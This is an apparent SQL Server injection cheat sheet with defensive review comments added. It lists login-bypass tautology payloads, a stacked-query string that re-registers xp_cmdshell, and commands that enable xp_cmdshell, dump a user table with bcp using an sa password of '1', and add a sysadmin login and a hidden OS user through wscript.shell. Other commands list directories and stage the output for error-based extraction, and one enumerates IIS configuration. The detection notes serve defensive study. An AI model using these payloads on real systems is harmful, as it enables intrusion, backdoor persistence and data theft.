-- Injection test strings for a login form.
-- Both strings are tautology payloads: they change the query only where the
-- application pastes the submitted value directly into the SQL text.
-- Defence: bind the username and password as parameters instead of
-- concatenating them, and log authentication input containing quote/OR patterns.
--' and 0<(select COUNT(*) from BJ_User) or '1'='1
' or '1'='1
-- Export table contents.
-- Runs the bcp utility through xp_cmdshell to write BJ_CARCESHI.dbo.bj_user to
-- c:\Temp.xls, connecting to the local instance (-S".") as sa with password "1".
-- NOTE(review): this depends on two weaknesses a defender should close: a
-- trivially guessable sa password and xp_cmdshell being callable by this session.
-- A file written by the SQL Server service account outside its data directories
-- is worth alerting on.
EXEC master..xp_cmdshell 'bcp BJ_CARCESHI.dbo.bj_user out c:\Temp.xls -c -q -S"." -U"sa" -P"1"'
-- Connected user.
-- Returns the login name of the current connection. If an application connection
-- reports sa or another sysadmin login here, the application is not running with
-- least privilege, and every statement below becomes reachable through it.
SELECT System_user
-- Enable cmdshell.
-- The SELECT checks whether xp_cmdshell is registered in master as an extended
-- stored procedure (xtype = 'X').
-- The two EXEC statements register xp_cmdshell from xplog70.dll, first by bare
-- file name and then by a full path under the web root.
-- NOTE(review): dropping the procedure is therefore not a durable control on its
-- own, since a login with sufficient rights can register it again as shown here.
-- Restrict the application login's server-level permissions and audit calls to
-- sp_addextendedproc.
SELECT * FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll'
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'c:\inetpub\wwwroot\xplog70.dll'
-- Section: enable xp_cmdshell
-- Changing these options requires the ALTER SETTINGS server permission (held by
-- sysadmin and serveradmin). Each sp_configure change is written to the SQL Server
-- error log, so an unexpected "xp_cmdshell changed from 0 to 1" entry is a
-- high-value detection signal.
--------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
-- Section: run a shell command through xp_cmdshell
-- The command string here is only 'bcp ' with no arguments, so it reads as a
-- placeholder for the export command shown earlier in this file.
-- Commands started this way appear as child processes of the SQL Server service,
-- which is what process-creation monitoring should watch for.
--------------------------------------------------
Exec xp_cmdshell 'bcp '
GO
-- Section: disable xp_cmdshell
-- NOTE(review): this section leaves 'show advanced options' at 1; set it back to 0
-- as well when the goal is to return the instance to a hardened state.
-----------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To disable the feature (the value is 0 here, not 1).
EXEC sp_configure 'xp_cmdshell', 0
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
-- Add a SQL login.
-- Creates the login 'china' with password '123', then adds it to the sysadmin
-- fixed server role, giving it full control of the instance.
-- Detection: SQL Server Audit action groups SERVER_PRINCIPAL_CHANGE_GROUP and
-- SERVER_ROLE_MEMBER_CHANGE_GROUP record both steps. Review sysadmin membership
-- regularly and enforce password policy on SQL logins.
exec master.dbo.sp_addlogin china,123
exec sp_addsrvrolemember 'china','sysadmin'
-- Add an operating-system user.
-- Uses the OLE Automation procedures (sp_oacreate / sp_oamethod) to create a
-- wscript.shell object and run "net user ... /add" through cmd.exe, i.e. a second
-- route to OS command execution that does not involve xp_cmdshell.
-- Defence: keep the 'Ole Automation Procedures' configuration option disabled
-- (its default), run the SQL Server service under a low-privilege account, and
-- alert on local account creation (Windows Security event 4720) on database hosts.
use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user jiaoniang$ 1866574 /add";
-- Get database names (author's note: ids 1 to 5 are system database ids, so only
-- ids of 6 and above are of interest).
-- Reads master.dbo.sysdatabases; an application login seldom needs to enumerate
-- other databases, so such reads from it are worth logging.
select name from master.dbo.sysdatabases where dbid>5
-- Directory listing staged in a scratch table.
-- dirs1 is created, filled from xp_dirtree for c:\, emptied, filled again from
-- "dir c:\ /B/D" run through xp_cmdshell, and then its first row is read back.
-- Defender note: an unexpected user table such as dirs1 appearing in an application
-- database, and calls to xp_dirtree or xp_cmdshell from the application login, are
-- indicators of compromise to alert on.
create table dirs1(paths varchar(1000),p varchar(1000))
insert dirs1 exec master.dbo.xp_dirtree 'c:\'
-- Unfiltered delete: empties the scratch table before the next insert.
delete from dirs1
insert dirs1 exec master.dbo.xp_cmdshell 'dir c:\ /B/D'
select top 1 paths from dirs1
-- The vulnerable pattern itself: application code that assembles the login query by
-- concatenating the username and password into the SQL string. The fragments below
-- are inputs to that concatenation, not standalone SQL.
-- The comparison of 0 with a value read from dirs1 presumably relies on database
-- error text being returned to the client (confirm against the application).
-- Defence: use parameterized commands, return only generic errors to clients, and
-- connect with a login that cannot run sp_addextendedproc or xp_cmdshell.
"select * from user1 where username='"+"' or '1'='1'";"+" and userpwd='' and 0=(select top 1 paths from dirs1)"
' or '1'='1
';EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll';select '
-- Runs the IIS administration script adsutil.vbs through xp_cmdshell to enumerate
-- the w3svc/1/root settings and redirects the output to a.txt.
-- Defender note: cscript.exe or cmd.exe started by the SQL Server service, and
-- stray output files such as a.txt, are process and file-system indicators to
-- monitor on a combined web/database host.
exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'
-- Scratch table with an identity column and a paths column; nothing on this page
-- inserts into it.
CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500))
sql注入